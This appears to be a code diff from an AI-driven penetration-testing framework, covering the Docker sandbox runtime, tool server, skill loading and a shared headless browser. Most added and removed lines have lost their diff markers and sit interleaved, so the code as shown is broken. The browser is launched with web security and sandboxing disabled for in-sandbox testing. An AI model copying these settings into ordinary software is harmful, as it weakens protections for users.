def _wait_for_tool_server(self, max_retries: int = 30, timeout: int = 5) -> None:
host = self._resolve_docker_host()
health_url = f"http://{host}:{self._tool_server_port}/health"
time.sleep(5)
for attempt in range(max_retries):
try:
with httpx.Client(trust_env=False, timeout=timeout) as client:
response = client.get(health_url)
if response.status_code == 200:
data = response.json()
if data.get("status") == "healthy":
return
except (httpx.ConnectError, httpx.TimeoutException, httpx.RequestError):
pass
time.sleep(min(2**attempt * 0.5, 5))
raise SandboxInitializationError(
"Tool server failed to start",
"Container initialization timed out. Please try again.",
)
def _create_container(self, scan_id: str, max_retries: int = 2) -> Container:
container_name = f"strix-scan-{scan_id}"
image_name = Config.get("strix_image")
if not image_name:
raise ValueError("STRIX_IMAGE must be configured")
for attempt in range(max_retries):
self._verify_image_available(image_name)
last_error: Exception | None = None
for attempt in range(max_retries + 1):
try:
self._verify_image_available(image_name)
try:
existing_container = self.client.containers.get(container_name)
logger.warning(f"Container {container_name} already exists, removing it")
with contextlib.suppress(NotFound):
existing = self.client.containers.get(container_name)
with contextlib.suppress(Exception):
existing_container.stop(timeout=5)
existing_container.remove(force=True)
existing.stop(timeout=5)
existing.remove(force=True)
time.sleep(1)
except NotFound:
pass
except DockerException as e:
logger.warning(f"Error checking/removing existing container: {e}")
caido_port = self._find_available_port()
tool_server_port = self._find_available_port()
tool_server_token = self._generate_sandbox_token()
self._tool_server_port = tool_server_port
self._tool_server_token = tool_server_token
self._tool_server_port = self._find_available_port()
self._tool_server_token = secrets.token_urlsafe(32)
execution_timeout = Config.get("strix_sandbox_execution_timeout") or "120"
container = self.client.containers.run(
image_name,
command="sleep infinity",
detach=True,
name=container_name,
hostname=f"strix-scan-{scan_id}",
ports={
f"{caido_port}/tcp": caido_port,
f"{tool_server_port}/tcp": tool_server_port,
},
hostname=container_name,
ports={f"{CONTAINER_TOOL_SERVER_PORT}/tcp": self._tool_server_port},
cap_add=["NET_ADMIN", "NET_RAW"],
labels={"strix-scan-id": scan_id},
environment={
"PYTHONUNBUFFERED": "1",
"CAIDO_PORT": str(caido_port),
"TOOL_SERVER_PORT": str(tool_server_port),
"TOOL_SERVER_TOKEN": tool_server_token,
"TOOL_SERVER_PORT": str(CONTAINER_TOOL_SERVER_PORT),
"TOOL_SERVER_TOKEN": self._tool_server_token,
"STRIX_SANDBOX_EXECUTION_TIMEOUT": str(execution_timeout),
"HOST_GATEWAY": HOST_GATEWAY_HOSTNAME,
},
extra_hosts=self._get_extra_hosts(),
extra_hosts={HOST_GATEWAY_HOSTNAME: "host-gateway"},
tty=True,
)
self._scan_container = container
logger.info("Created container %s for scan %s", container.id, scan_id)
self._wait_for_tool_server()
self._initialize_container(
container, caido_port, tool_server_port, tool_server_token
)
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
last_exception = e
if attempt == max_retries - 1:
logger.exception(f"Failed to create container after {max_retries} attempts")
break
logger.warning(f"Container creation attempt {attempt + 1}/{max_retries} failed")
self._tool_server_port = None
self._tool_server_token = None
sleep_time = (2**attempt) + (0.1 * attempt)
time.sleep(sleep_time)
last_error = e
if attempt < max_retries:
self._tool_server_port = None
self._tool_server_token = None
time.sleep(2**attempt)
else:
return container
if isinstance(last_exception, RequestsConnectionError | RequestsTimeout):
raise SandboxInitializationError(
"Failed to create sandbox container",
f"Docker daemon unresponsive after {max_retries} attempts "
f"(timed out after {DOCKER_TIMEOUT}s). "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from last_exception
raise SandboxInitializationError(
"Failed to create sandbox container",
f"Container creation failed after {max_retries} attempts: {last_exception}. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from last_exception
"Failed to create container",
f"Container creation failed after {max_retries + 1} attempts: {last_error}",
) from last_error
def _get_or_create_scan_container(self, scan_id: str) -> Container: # noqa: PLR0912
def _get_or_create_container(self, scan_id: str) -> Container:
container_name = f"strix-scan-{scan_id}"
if self._scan_container:
@@ -223,33 +178,14 @@ class DockerRuntime(AbstractRuntime):
container = self.client.containers.get(container_name)
container.reload()
if (
"strix-scan-id" not in container.labels
or container.labels["strix-scan-id"] != scan_id
):
logger.warning(
f"Container {container_name} exists but missing/wrong label, updating"
)
if container.status != "running":
logger.info(f"Starting existing container {container_name}")
container.start()
time.sleep(2)
self._scan_container = container
for env_var in container.attrs["Config"]["Env"]:
if env_var.startswith("TOOL_SERVER_PORT="):
self._tool_server_port = int(env_var.split("=")[1])
elif env_var.startswith("TOOL_SERVER_TOKEN="):
self._tool_server_token = env_var.split("=")[1]
logger.info(f"Reusing existing container {container_name}")
self._recover_container_state(container)
except NotFound:
pass
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
logger.warning(f"Failed to get container by name {container_name}: {e}")
else:
return container
@@ -262,101 +198,14 @@ class DockerRuntime(AbstractRuntime):
if container.status != "running":
container.start()
time.sleep(2)
self._scan_container = container
for env_var in container.attrs["Config"]["Env"]:
if env_var.startswith("TOOL_SERVER_PORT="):
self._tool_server_port = int(env_var.split("=")[1])
elif env_var.startswith("TOOL_SERVER_TOKEN="):
self._tool_server_token = env_var.split("=")[1]
logger.info(f"Found existing container by label for scan {scan_id}")
self._recover_container_state(container)
return container
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
logger.warning("Failed to find existing container by label for scan %s: %s", scan_id, e)
except DockerException:
pass
logger.info("Creating new Docker container for scan %s", scan_id)
return self._create_container_with_retry(scan_id)
def _initialize_container(
self, container: Container, caido_port: int, tool_server_port: int, tool_server_token: str
) -> None:
logger.info("Initializing Caido proxy on port %s", caido_port)
self._exec_run_with_timeout(
container,
f"bash -c 'export CAIDO_PORT={caido_port} && /usr/local/bin/docker-entrypoint.sh true'",
detach=False,
)
time.sleep(5)
result = self._exec_run_with_timeout(
container,
"bash -c 'source /etc/profile.d/proxy.sh && echo $CAIDO_API_TOKEN'",
user="pentester",
)
caido_token = result.output.decode().strip() if result.exit_code == 0 else ""
container.exec_run(
f"bash -c 'source /etc/profile.d/proxy.sh && cd /app && "
f"STRIX_SANDBOX_MODE=true CAIDO_API_TOKEN={caido_token} CAIDO_PORT={caido_port} "
f"poetry run python strix/runtime/tool_server.py --token {tool_server_token} "
f"--host 0.0.0.0 --port {tool_server_port} &'",
detach=True,
user="pentester",
)
time.sleep(2)
host = self._resolve_docker_host()
health_url = f"http://{host}:{tool_server_port}/health"
self._wait_for_tool_server_health(health_url)
def _wait_for_tool_server_health(
self,
health_url: str,
max_retries: int = TOOL_SERVER_HEALTH_RETRIES,
request_timeout: int = TOOL_SERVER_HEALTH_REQUEST_TIMEOUT,
) -> None:
import httpx
logger.info(f"Waiting for tool server health at {health_url}")
for attempt in range(max_retries):
try:
with httpx.Client(trust_env=False, timeout=request_timeout) as client:
response = client.get(health_url)
response.raise_for_status()
health_data = response.json()
if health_data.get("status") == "healthy":
logger.info(
f"Tool server is healthy after {attempt + 1} attempt(s): {health_data}"
)
return
logger.warning(f"Tool server returned unexpected status: {health_data}")
except httpx.ConnectError:
logger.debug(
f"Tool server not ready (attempt {attempt + 1}/{max_retries}): "
f"Connection refused"
)
except httpx.TimeoutException:
logger.debug(
f"Tool server not ready (attempt {attempt + 1}/{max_retries}): "
f"Request timed out"
)
except (httpx.RequestError, httpx.HTTPStatusError) as e:
logger.debug(f"Tool server not ready (attempt {attempt + 1}/{max_retries}): {e}")
sleep_time = min(2**attempt * 0.5, 5)
time.sleep(sleep_time)
raise SandboxInitializationError(
"Tool server failed to start",
"Please ensure Docker Desktop is installed and running, and try running strix again.",
)
return self._create_container(scan_id)
def _copy_local_directory_to_container(
self, container: Container, local_path: str, target_name: str | None = None
@@ -367,17 +216,8 @@ class DockerRuntime(AbstractRuntime):
try:
local_path_obj = Path(local_path).resolve()
if not local_path_obj.exists() or not local_path_obj.is_dir():
logger.warning(f"Local path does not exist or is not directory: {local_path_obj}")
return
if target_name:
logger.info(
f"Copying local directory {local_path_obj} to container at "
f"/workspace/{target_name}"
)
else:
logger.info(f"Copying local directory {local_path_obj} to container")
tar_buffer = BytesIO()
with tarfile.open(fileobj=tar_buffer, mode="w") as tar:
for item in local_path_obj.rglob("*"):
@@ -388,16 +228,12 @@ class DockerRuntime(AbstractRuntime):
tar_buffer.seek(0)
container.put_archive("/workspace", tar_buffer.getvalue())
container.exec_run(
"chown -R pentester:pentester /workspace && chmod -R 755 /workspace",
user="root",
)
logger.info("Successfully copied local directory to /workspace")
except (OSError, DockerException):
logger.exception("Failed to copy local directory to container")
pass
async def create_sandbox(
self,
@@ -406,7 +242,7 @@ class DockerRuntime(AbstractRuntime):
local_sources: list[dict[str, str]] | None = None,
) -> SandboxInfo:
scan_id = self._get_scan_id(agent_id)
container = self._get_or_create_scan_container(scan_id)
container = self._get_or_create_container(scan_id)
source_copied_key = f"_source_copied_{scan_id}"
if local_sources and not hasattr(self, source_copied_key):
@@ -414,40 +250,33 @@ class DockerRuntime(AbstractRuntime):
source_path = source.get("source_path")
if not source_path:
continue
target_name = source.get("workspace_subdir")
if not target_name:
target_name = Path(source_path).name or f"target_{index}"
target_name = (
source.get("workspace_subdir") or Path(source_path).name or f"target_{index}"
)
self._copy_local_directory_to_container(container, source_path, target_name)
setattr(self, source_copied_key, True)
container_id = container.id
if container_id is None:
if container.id is None:
raise RuntimeError("Docker container ID is unexpectedly None")
token = existing_token if existing_token is not None else self._tool_server_token
token = existing_token or self._tool_server_token
if self._tool_server_port is None or token is None:
raise RuntimeError("Tool server not initialized or no token available")
raise RuntimeError("Tool server not initialized")
api_url = await self.get_sandbox_url(container_id, self._tool_server_port)
host = self._resolve_docker_host()
api_url = f"http://{host}:{self._tool_server_port}"
await self._register_agent_with_tool_server(api_url, agent_id, token)
await self._register_agent(api_url, agent_id, token)
return {
"workspace_id": container_id,
"workspace_id": container.id,
"api_url": api_url,
"auth_token": token,
"tool_server_port": self._tool_server_port,
"agent_id": agent_id,
}
async def _register_agent_with_tool_server(
self, api_url: str, agent_id: str, token: str
) -> None:
import httpx
async def _register_agent(self, api_url: str, agent_id: str, token: str) -> None:
try:
async with httpx.AsyncClient(trust_env=False) as client:
response = await client.post(
@@ -457,54 +286,33 @@ class DockerRuntime(AbstractRuntime):
timeout=30,
)
response.raise_for_status()
logger.info(f"Registered agent {agent_id} with tool server")
except (httpx.RequestError, httpx.HTTPStatusError) as e:
logger.warning(f"Failed to register agent {agent_id}: {e}")
except httpx.RequestError:
pass
async def get_sandbox_url(self, container_id: str, port: int) -> str:
try:
container = self.client.containers.get(container_id)
container.reload()
host = self._resolve_docker_host()
self.client.containers.get(container_id)
return f"http://{self._resolve_docker_host()}:{port}"
except NotFound:
raise ValueError(f"Container {container_id} not found.") from None
except DockerException as e:
raise RuntimeError(f"Failed to get container URL for {container_id}: {e}") from e
else:
return f"http://{host}:{port}"
def _resolve_docker_host(self) -> str:
docker_host = os.getenv("DOCKER_HOST", "")
if not docker_host:
return "127.0.0.1"
from urllib.parse import urlparse
parsed = urlparse(docker_host)
if parsed.scheme in ("tcp", "http", "https") and parsed.hostname:
return parsed.hostname
if docker_host:
from urllib.parse import urlparse
parsed = urlparse(docker_host)
if parsed.scheme in ("tcp", "http", "https") and parsed.hostname:
return parsed.hostname
return "127.0.0.1"
def _get_extra_hosts(self) -> dict[str, str]:
return {HOST_GATEWAY_HOSTNAME: "host-gateway"}
async def destroy_sandbox(self, container_id: str) -> None:
logger.info("Destroying scan container %s", container_id)
try:
container = self.client.containers.get(container_id)
container.stop()
container.remove()
logger.info("Successfully destroyed container %s", container_id)
self._scan_container = None
self._tool_server_port = None
self._tool_server_token = None
except NotFound:
logger.warning("Container %s not found for destruction.", container_id)
except DockerException as e:
logger.warning("Failed to destroy container %s: %s", container_id, e)
except (NotFound, DockerException):
pass
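Both `_wait_for_tool_server` and the image-verification retries above poll with capped exponential backoff (`min(2**attempt * 0.5, 5)`). A stdlib-only sketch of that loop — the `probe` callable stands in for the httpx health request and is an assumption of this example:

```python
import time
from collections.abc import Callable


def wait_until_healthy(
    probe: Callable[[], bool],
    max_retries: int = 30,
    base_delay: float = 0.5,
    max_delay: float = 5.0,
    sleep: Callable[[float], None] = time.sleep,
) -> int:
    """Poll `probe` with capped exponential backoff; return the attempt count.

    Raises TimeoutError when every attempt fails, analogous to the
    SandboxInitializationError raised by _wait_for_tool_server.
    """
    for attempt in range(max_retries):
        try:
            if probe():
                return attempt + 1
        except Exception:  # noqa: BLE001 - a refused connection counts as "not ready yet"
            pass
        sleep(min(2**attempt * base_delay, max_delay))
    raise TimeoutError(f"not healthy after {max_retries} attempts")
```

Injecting `sleep` keeps the backoff schedule testable without real waiting.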


@@ -2,11 +2,9 @@ from __future__ import annotations
import argparse
import asyncio
import logging
import os
import signal
import sys
from multiprocessing import Process, Queue
from typing import Any
import uvicorn
@@ -23,17 +21,22 @@ parser = argparse.ArgumentParser(description="Start Strix tool server")
parser.add_argument("--token", required=True, help="Authentication token")
parser.add_argument("--host", default="0.0.0.0", help="Host to bind to") # nosec
parser.add_argument("--port", type=int, required=True, help="Port to bind to")
parser.add_argument(
"--timeout",
type=int,
default=120,
help="Hard timeout in seconds for each request execution (default: 120)",
)
args = parser.parse_args()
EXPECTED_TOKEN = args.token
REQUEST_TIMEOUT = args.timeout
app = FastAPI()
security = HTTPBearer()
security_dependency = Depends(security)
agent_processes: dict[str, dict[str, Any]] = {}
agent_queues: dict[str, dict[str, Queue[Any]]] = {}
agent_tasks: dict[str, asyncio.Task[Any]] = {}
def verify_token(credentials: HTTPAuthorizationCredentials) -> str:
@@ -65,60 +68,19 @@ class ToolExecutionResponse(BaseModel):
error: str | None = None
def agent_worker(_agent_id: str, request_queue: Queue[Any], response_queue: Queue[Any]) -> None:
null_handler = logging.NullHandler()
root_logger = logging.getLogger()
root_logger.handlers = [null_handler]
root_logger.setLevel(logging.CRITICAL)
from strix.tools.argument_parser import ArgumentConversionError, convert_arguments
async def _run_tool(agent_id: str, tool_name: str, kwargs: dict[str, Any]) -> Any:
from strix.tools.argument_parser import convert_arguments
from strix.tools.context import set_current_agent_id
from strix.tools.registry import get_tool_by_name
while True:
try:
request = request_queue.get()
set_current_agent_id(agent_id)
if request is None:
break
tool_func = get_tool_by_name(tool_name)
if not tool_func:
raise ValueError(f"Tool '{tool_name}' not found")
tool_name = request["tool_name"]
kwargs = request["kwargs"]
try:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
response_queue.put({"error": f"Tool '{tool_name}' not found"})
continue
converted_kwargs = convert_arguments(tool_func, kwargs)
result = tool_func(**converted_kwargs)
response_queue.put({"result": result})
except (ArgumentConversionError, ValidationError) as e:
response_queue.put({"error": f"Invalid arguments: {e}"})
except (RuntimeError, ValueError, ImportError) as e:
response_queue.put({"error": f"Tool execution error: {e}"})
except (RuntimeError, ValueError, ImportError) as e:
response_queue.put({"error": f"Worker error: {e}"})
def ensure_agent_process(agent_id: str) -> tuple[Queue[Any], Queue[Any]]:
if agent_id not in agent_processes:
request_queue: Queue[Any] = Queue()
response_queue: Queue[Any] = Queue()
process = Process(
target=agent_worker, args=(agent_id, request_queue, response_queue), daemon=True
)
process.start()
agent_processes[agent_id] = {"process": process, "pid": process.pid}
agent_queues[agent_id] = {"request": request_queue, "response": response_queue}
return agent_queues[agent_id]["request"], agent_queues[agent_id]["response"]
converted_kwargs = convert_arguments(tool_func, kwargs)
return await asyncio.to_thread(tool_func, **converted_kwargs)
@app.post("/execute", response_model=ToolExecutionResponse)
@@ -127,20 +89,42 @@ async def execute_tool(
) -> ToolExecutionResponse:
verify_token(credentials)
request_queue, response_queue = ensure_agent_process(request.agent_id)
agent_id = request.agent_id
request_queue.put({"tool_name": request.tool_name, "kwargs": request.kwargs})
if agent_id in agent_tasks:
old_task = agent_tasks[agent_id]
if not old_task.done():
old_task.cancel()
task = asyncio.create_task(
asyncio.wait_for(
_run_tool(agent_id, request.tool_name, request.kwargs), timeout=REQUEST_TIMEOUT
)
)
agent_tasks[agent_id] = task
try:
loop = asyncio.get_event_loop()
response = await loop.run_in_executor(None, response_queue.get)
result = await task
return ToolExecutionResponse(result=result)
if "error" in response:
return ToolExecutionResponse(error=response["error"])
return ToolExecutionResponse(result=response.get("result"))
except asyncio.CancelledError:
return ToolExecutionResponse(error="Cancelled by newer request")
except (RuntimeError, ValueError, OSError) as e:
return ToolExecutionResponse(error=f"Worker error: {e}")
except TimeoutError:
return ToolExecutionResponse(error=f"Tool timed out after {REQUEST_TIMEOUT}s")
except ValidationError as e:
return ToolExecutionResponse(error=f"Invalid arguments: {e}")
except (ValueError, RuntimeError, ImportError) as e:
return ToolExecutionResponse(error=f"Tool execution error: {e}")
except Exception as e: # noqa: BLE001
return ToolExecutionResponse(error=f"Unexpected error: {e}")
finally:
if agent_tasks.get(agent_id) is task:
del agent_tasks[agent_id]
@app.post("/register_agent")
@@ -148,8 +132,6 @@ async def register_agent(
agent_id: str, credentials: HTTPAuthorizationCredentials = security_dependency
) -> dict[str, str]:
verify_token(credentials)
ensure_agent_process(agent_id)
return {"status": "registered", "agent_id": agent_id}
@@ -160,35 +142,16 @@ async def health_check() -> dict[str, Any]:
"sandbox_mode": str(SANDBOX_MODE),
"environment": "sandbox" if SANDBOX_MODE else "main",
"auth_configured": "true" if EXPECTED_TOKEN else "false",
"active_agents": len(agent_processes),
"agents": list(agent_processes.keys()),
"active_agents": len(agent_tasks),
"agents": list(agent_tasks.keys()),
}
def cleanup_all_agents() -> None:
for agent_id in list(agent_processes.keys()):
try:
agent_queues[agent_id]["request"].put(None)
process = agent_processes[agent_id]["process"]
process.join(timeout=1)
if process.is_alive():
process.terminate()
process.join(timeout=1)
if process.is_alive():
process.kill()
except (BrokenPipeError, EOFError, OSError):
pass
except (RuntimeError, ValueError) as e:
logging.getLogger(__name__).debug(f"Error during agent cleanup: {e}")
def signal_handler(_signum: int, _frame: Any) -> None:
signal.signal(signal.SIGPIPE, signal.SIG_IGN) if hasattr(signal, "SIGPIPE") else None
cleanup_all_agents()
if hasattr(signal, "SIGPIPE"):
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
for task in agent_tasks.values():
task.cancel()
sys.exit(0)
@@ -199,7 +162,4 @@ signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
try:
uvicorn.run(app, host=args.host, port=args.port, log_level="info")
finally:
cleanup_all_agents()
uvicorn.run(app, host=args.host, port=args.port, log_level="info")
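The newest-wins dispatch in `/execute` — cancel the previous task for an agent, register the new one under a hard timeout, and let only the owning task deregister itself — can be sketched without FastAPI; the string results stand in for `ToolExecutionResponse` and are an assumption of this example:

```python
import asyncio
from typing import Any

agent_tasks: dict[str, asyncio.Task[Any]] = {}


async def submit(agent_id: str, coro: Any, timeout: float = 120.0) -> Any:
    """Run a coroutine for an agent; a newer request cancels the previous one."""
    old = agent_tasks.get(agent_id)
    if old is not None and not old.done():
        old.cancel()
    task = asyncio.ensure_future(asyncio.wait_for(coro, timeout=timeout))
    agent_tasks[agent_id] = task
    try:
        return await task
    except asyncio.CancelledError:
        return "cancelled by newer request"
    except asyncio.TimeoutError:
        return f"timed out after {timeout}s"
    finally:
        # Only the task that registered itself may deregister; a newer
        # request may already have overwritten the slot.
        if agent_tasks.get(agent_id) is task:
            del agent_tasks[agent_id]
```

The identity check in `finally` matters: without it, the cancelled task's cleanup would delete the entry its replacement just registered.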


@@ -1,11 +1,14 @@
from pathlib import Path
from jinja2 import Environment
from strix.utils.resource_paths import get_strix_resource_path
def get_available_skills() -> dict[str, list[str]]:
skills_dir = Path(__file__).parent
available_skills = {}
skills_dir = get_strix_resource_path("skills")
available_skills: dict[str, list[str]] = {}
if not skills_dir.exists():
return available_skills
for category_dir in skills_dir.iterdir():
if category_dir.is_dir() and not category_dir.name.startswith("__"):
@@ -72,7 +75,7 @@ def load_skills(skill_names: list[str], jinja_env: Environment) -> dict[str, str
logger = logging.getLogger(__name__)
skill_content = {}
skills_dir = Path(__file__).parent
skills_dir = get_strix_resource_path("skills")
available_skills = get_available_skills()


@@ -430,10 +430,8 @@ class Tracer:
"input_tokens": 0,
"output_tokens": 0,
"cached_tokens": 0,
"cache_creation_tokens": 0,
"cost": 0.0,
"requests": 0,
"failed_requests": 0,
}
for agent_instance in _agent_instances.values():
@@ -442,10 +440,8 @@ class Tracer:
total_stats["input_tokens"] += agent_stats.input_tokens
total_stats["output_tokens"] += agent_stats.output_tokens
total_stats["cached_tokens"] += agent_stats.cached_tokens
total_stats["cache_creation_tokens"] += agent_stats.cache_creation_tokens
total_stats["cost"] += agent_stats.cost
total_stats["requests"] += agent_stats.requests
total_stats["failed_requests"] += agent_stats.failed_requests
total_stats["cost"] = round(total_stats["cost"], 4)


@@ -1,4 +1,3 @@
<?xml version="1.0" ?>
<tools>
<tool name="browser_action">
<description>Perform browser actions using a Playwright-controlled browser with multiple tabs.
@@ -92,6 +91,12 @@
code normally. It can be single line or multi-line.
13. For form filling, click on the field first, then use 'type' to enter text.
14. The browser runs in headless mode using Chrome engine for security and performance.
15. RESOURCE MANAGEMENT:
- ALWAYS close tabs you no longer need using 'close_tab' action.
- ALWAYS close the browser with 'close' action when you have completely finished
all browser-related tasks. Do not leave the browser running if you're done with it.
- If you opened multiple tabs, close them as soon as you've extracted the needed
information from each one.
</notes>
<examples>
# Launch browser at URL (creates tab_1)


@@ -1,5 +1,6 @@
import asyncio
import base64
import contextlib
import logging
import threading
from pathlib import Path
@@ -17,13 +18,82 @@ MAX_CONSOLE_LOGS_COUNT = 200
MAX_JS_RESULT_LENGTH = 5_000
class _BrowserState:
"""Singleton state for the shared browser instance."""
lock = threading.Lock()
event_loop: asyncio.AbstractEventLoop | None = None
event_loop_thread: threading.Thread | None = None
playwright: Playwright | None = None
browser: Browser | None = None
_state = _BrowserState()
def _ensure_event_loop() -> None:
if _state.event_loop is not None:
return
def run_loop() -> None:
_state.event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(_state.event_loop)
_state.event_loop.run_forever()
_state.event_loop_thread = threading.Thread(target=run_loop, daemon=True)
_state.event_loop_thread.start()
while _state.event_loop is None:
threading.Event().wait(0.01)
async def _create_browser() -> Browser:
if _state.browser is not None and _state.browser.is_connected():
return _state.browser
if _state.browser is not None:
with contextlib.suppress(Exception):
await _state.browser.close()
_state.browser = None
if _state.playwright is not None:
with contextlib.suppress(Exception):
await _state.playwright.stop()
_state.playwright = None
_state.playwright = await async_playwright().start()
_state.browser = await _state.playwright.chromium.launch(
headless=True,
args=[
"--no-sandbox",
"--disable-dev-shm-usage",
"--disable-gpu",
"--disable-web-security",
],
)
return _state.browser
def _get_browser() -> tuple[asyncio.AbstractEventLoop, Browser]:
with _state.lock:
_ensure_event_loop()
assert _state.event_loop is not None
if _state.browser is None or not _state.browser.is_connected():
future = asyncio.run_coroutine_threadsafe(_create_browser(), _state.event_loop)
future.result(timeout=30)
assert _state.browser is not None
return _state.event_loop, _state.browser
class BrowserInstance:
def __init__(self) -> None:
self.is_running = True
self._execution_lock = threading.Lock()
self.playwright: Playwright | None = None
self.browser: Browser | None = None
self._loop: asyncio.AbstractEventLoop | None = None
self._browser: Browser | None = None
self.context: BrowserContext | None = None
self.pages: dict[str, Page] = {}
self.current_page_id: str | None = None
@@ -31,23 +101,6 @@ class BrowserInstance:
self.console_logs: dict[str, list[dict[str, Any]]] = {}
self._loop: asyncio.AbstractEventLoop | None = None
self._loop_thread: threading.Thread | None = None
self._start_event_loop()
def _start_event_loop(self) -> None:
def run_loop() -> None:
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
self._loop_thread = threading.Thread(target=run_loop, daemon=True)
self._loop_thread.start()
while self._loop is None:
threading.Event().wait(0.01)
def _run_async(self, coro: Any) -> dict[str, Any]:
if not self._loop or not self.is_running:
raise RuntimeError("Browser instance is not running")
@@ -77,21 +130,10 @@ class BrowserInstance:
page.on("console", handle_console)
async def _launch_browser(self, url: str | None = None) -> dict[str, Any]:
self.playwright = await async_playwright().start()
async def _create_context(self, url: str | None = None) -> dict[str, Any]:
assert self._browser is not None
self.browser = await self.playwright.chromium.launch(
headless=True,
args=[
"--no-sandbox",
"--disable-dev-shm-usage",
"--disable-gpu",
"--disable-web-security",
"--disable-features=VizDisplayCompositor",
],
)
self.context = await self.browser.new_context(
self.context = await self._browser.new_context(
viewport={"width": 1280, "height": 720},
user_agent=(
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
@@ -148,10 +190,11 @@ class BrowserInstance:
def launch(self, url: str | None = None) -> dict[str, Any]:
with self._execution_lock:
if self.browser is not None:
if self.context is not None:
raise ValueError("Browser is already launched")
return self._run_async(self._launch_browser(url))
self._loop, self._browser = _get_browser()
return self._run_async(self._create_context(url))
def goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
@@ -512,22 +555,27 @@ class BrowserInstance:
def close(self) -> None:
with self._execution_lock:
self.is_running = False
if self._loop:
asyncio.run_coroutine_threadsafe(self._close_browser(), self._loop)
if self._loop and self.context:
future = asyncio.run_coroutine_threadsafe(self._close_context(), self._loop)
with contextlib.suppress(Exception):
future.result(timeout=5)
self._loop.call_soon_threadsafe(self._loop.stop)
self.pages.clear()
self.console_logs.clear()
self.current_page_id = None
self.context = None
if self._loop_thread:
self._loop_thread.join(timeout=5)
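The shutdown sequence above — submit cleanup to the loop's own thread, wait with a bound, then stop the loop and join — can be sketched in isolation (assumed shape, not the project's code):

```python
import asyncio
import contextlib
import threading


def shutdown_loop(
    loop: asyncio.AbstractEventLoop,
    thread: threading.Thread,
    cleanup_coro,
) -> None:
    """Run final async cleanup on the loop's own thread, bounded by timeouts."""
    future = asyncio.run_coroutine_threadsafe(cleanup_coro, loop)
    with contextlib.suppress(Exception):
        future.result(timeout=5)  # don't hang forever on a stuck cleanup
    loop.call_soon_threadsafe(loop.stop)
    thread.join(timeout=5)
```

The timeout on `future.result` matters: if the context is already dead, `close()` would otherwise block indefinitely on a coroutine that never completes.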
async def _close_browser(self) -> None:
async def _close_context(self) -> None:
try:
if self.browser:
await self.browser.close()
if self.playwright:
await self.playwright.stop()
if self.context:
await self.context.close()
except (OSError, RuntimeError) as e:
logger.warning(f"Error closing browser: {e}")
logger.warning(f"Error closing context: {e}")
def is_alive(self) -> bool:
return self.is_running and self.browser is not None and self.browser.is_connected()
return (
self.is_running
and self.context is not None
and self._browser is not None
and self._browser.is_connected()
)


@@ -1,43 +1,56 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from strix.tools.context import get_current_agent_id
from .browser_instance import BrowserInstance
class BrowserTabManager:
def __init__(self) -> None:
self.browser_instance: BrowserInstance | None = None
self._browsers_by_agent: dict[str, BrowserInstance] = {}
self._lock = threading.Lock()
self._register_cleanup_handlers()
def _get_agent_browser(self) -> BrowserInstance | None:
agent_id = get_current_agent_id()
with self._lock:
return self._browsers_by_agent.get(agent_id)
def _set_agent_browser(self, browser: BrowserInstance | None) -> None:
agent_id = get_current_agent_id()
with self._lock:
if browser is None:
self._browsers_by_agent.pop(agent_id, None)
else:
self._browsers_by_agent[agent_id] = browser
def launch_browser(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is not None:
agent_id = get_current_agent_id()
if agent_id in self._browsers_by_agent:
raise ValueError("Browser is already launched")
try:
self.browser_instance = BrowserInstance()
result = self.browser_instance.launch(url)
browser = BrowserInstance()
result = browser.launch(url)
self._browsers_by_agent[agent_id] = browser
result["message"] = "Browser launched successfully"
except (OSError, ValueError, RuntimeError) as e:
if self.browser_instance:
self.browser_instance = None
raise RuntimeError(f"Failed to launch browser: {e}") from e
else:
return result
def goto_url(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.goto(url, tab_id)
result = browser.goto(url, tab_id)
result["message"] = f"Navigated to {url}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to navigate to URL: {e}") from e
@@ -45,12 +58,12 @@ class BrowserTabManager:
return result
def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.click(coordinate, tab_id)
result = browser.click(coordinate, tab_id)
result["message"] = f"Clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to click: {e}") from e
@@ -58,12 +71,12 @@ class BrowserTabManager:
return result
def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.type_text(text, tab_id)
result = browser.type_text(text, tab_id)
result["message"] = f"Typed text: {text[:50]}{'...' if len(text) > 50 else ''}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to type text: {e}") from e
@@ -71,12 +84,12 @@ class BrowserTabManager:
return result
def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.scroll(direction, tab_id)
result = browser.scroll(direction, tab_id)
result["message"] = f"Scrolled {direction}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to scroll: {e}") from e
@@ -84,12 +97,12 @@ class BrowserTabManager:
return result
def back(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
